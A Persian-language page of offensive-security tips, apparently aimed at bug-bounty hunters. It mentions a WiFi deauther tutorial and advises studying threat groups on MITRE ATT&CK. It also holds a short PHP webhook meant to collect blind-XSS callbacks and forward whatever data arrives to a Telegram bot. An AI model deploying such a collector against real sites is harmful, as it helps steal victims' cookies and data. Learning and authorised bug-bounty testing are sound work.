آموزش ساخت گجت WiFi Deauther | تست نفوذ شبکههای بیسیم (آموزشی)
⬅️مشاهده ویدیو در یوتیوب➡️
Code Block
یک وب هوک ساده برای پیاده سازیXSS BLIND و دریافت تایید در تلگرام کافیه در روت سرورتون این فایل رو قرار بدید و درخواست رو بهش ارسال کنید .
آموزش XSS
<?php
// 1. Capture the data
$data = $_REQUEST['log'] ?? 'No data received';
$apiToken = "5495368924:**-yOM089UU";
$chatId = "5*6";
// 3. Prepare the message
$message = "New Log Entry:\n" . $data;
// 4. Send the request
$url = "https://api.telegram.org/bot$apiToken/sendMessage?chat_id=$chatId&text=" . urlencode($message);
$response = file_get_contents($url);
// Optional: Check if it worked
if ($response) {
echo "Log sent to Telegram!";
}
?>
چطور از 5 گروه برتر سال یاد بگیریم !؟
قدم اول به وبسایت زیر برید
https://attack.mitre.org
قدم دوم اسم گروه رو سرچ کنید (برای مثال Lazarus) و روی نتیجه جستجو در صورت وجود کلیک کنید .
قدم سوم شروع به خواندن در مورد گروه کنید و اگر انگلیسی بلد نیستید از هوش مصنوعی یا گوگل Translate استفاده کنید .
تقریبا میشه گفت مهم ترین بهش در هر گروه Techniqus Used هست که در واقع روش هایی هستند که اون تیم از اونها استفاده میکنه البته فقط تکنیک هایی که شناسایی شدند
یک نمونه ارسال گزارش مزخرف در هکروان که هیچ چیزیو رعایت نکرده توجه داشته باشید که در زمان ارسال گزارش خیلی باید حواستون باشه به impact و توضیحی که درمورد آسیب پذیری ارائه میدید
Code Block
این یکی گزارشمو توی هکروان شیر میکنم باهاتون اما چرا فقط این و گذاشتم ؟ چون یک تارگتی بود که خفن ترینای دنیا توی هکروان روش کار کرده بودن و من این و زدم اگه Duplicate.
نخورد
Code Block